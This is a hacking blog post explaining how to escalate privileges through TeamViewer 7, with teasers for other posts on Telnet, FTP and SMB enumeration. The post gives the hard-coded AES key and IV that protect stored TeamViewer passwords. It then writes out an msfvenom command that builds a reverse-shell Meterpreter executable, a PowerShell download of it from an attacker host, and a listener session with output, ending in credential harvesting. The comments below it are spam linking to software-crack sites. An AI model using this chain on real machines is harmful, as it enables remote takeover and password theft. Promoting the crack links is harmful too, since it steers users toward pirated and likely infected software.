Skip to main content

TeamViewer 7 Privilege Escalation




Hello!

Today was a good day. I learned how to exploit a privesc vulnerability in TeamViewer (version 7) which had eluded me for quite some time due to a lack of user-friendly resources available online. But today I am changing all that ;)

So basically, TeamViewer 7 stores user passwords encrypted with AES-128-CBC with a key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. This means that someone can decrypt that password using that key and iv and use it elsewhere if the user in question made repeated use of their password (as users often do!)

Now, the process is doing this manually is complicated but luckily for us, a Metasploit module exists to automate this for us!

First. generate a payload with msfvenom like so:


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip attacker> LPORT=4444 -f exe > revshell.exe


Then move the payload to the machine with PowerShell (remember to move to the file to the /var/www/html directory if you are using Linux, as you should be. A "sudo /etc/init.d/apache2 restart" may be required).

$ invoke-webrequest -Uri http://<ip attacker>/revshell.exe -OutFile revshell.exe


Fire up msfconsole and set up a listener: 








msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500
meterpreter >






Finally, run the TeamViewer password gathering module in Meterpreter and smile at the results!































Labels:





























Comments









  1. shakeel13 June 2021 at 02:51

    Keep up the good writing.
     wincracker.com
    TeamViewer  Crack 
    ReplyDelete
  2. fullcrackedpc13 July 2021 at 19:19
    After looking through a few blog articles on your website,
    we sincerely appreciate the way you blogged.
    We've added it to our list of bookmarked web pages and will be checking back in the near
    future. Please also visit my website and tell us what you think.
    fullcrackedpc.com
    Elsten Software Bliss Crack
    O&O BrowserPrivacy Crack
    TeamViewer Crack
    MorphVox Pro Crack
    Arcade VST Output Crack
    ReplyDelete











Post a Comment



















Popular posts from this blog





















The Basics: Telnet, FTP and SMB




























This post explains three very basic things you should know about hacking. Those are Telnet, FTP, and SMB.   Telnet is a client-server protocol used to test connectivity between machines and issue commands. This is very easy way to gain access to a remote computer. This is almost never installed on production machines anymore  FTP (File Transfer Protocol) and SMB (Server Message Block) are tools used to store and access files. If these are installed, you can use commands associated with each tool to view files on the remote computer. Sometimes, these contain valuable information that you can use to elevate access.    Telnet    $  telnet <IP> <PORT>     That's all there is to it :)    FTP   $  ftp <IP> <PORT>    - port is usually 21 - Check if ftp supports anonymous login (username: anonymous, no password) -use ls to list files, "get" to copy files to your local machine   If you get the message: 200 PORT command successful. Consider using PASV. 425 F




















Post a Comment









Read more






























All About SMB




























The first step of enumerating networks is to identify common network services. These are Telnet, SMB and FTP. First step of enumeration is to conduct a port scan using nmap. A good tool to use to enumerate networks is enum4linux. What is SMB? SMB - Server Message Block Protocol -  is a  client-server communication protocol used for sharing access to files,  printers, serial ports and other resources on a network. [ source ] Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers. The SMB protocol is known as a response-request protocol, meaning that  it transmits multiple messages between the client and server to  establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX. How does SMB work? Once they have establ




















Post a Comment









Read more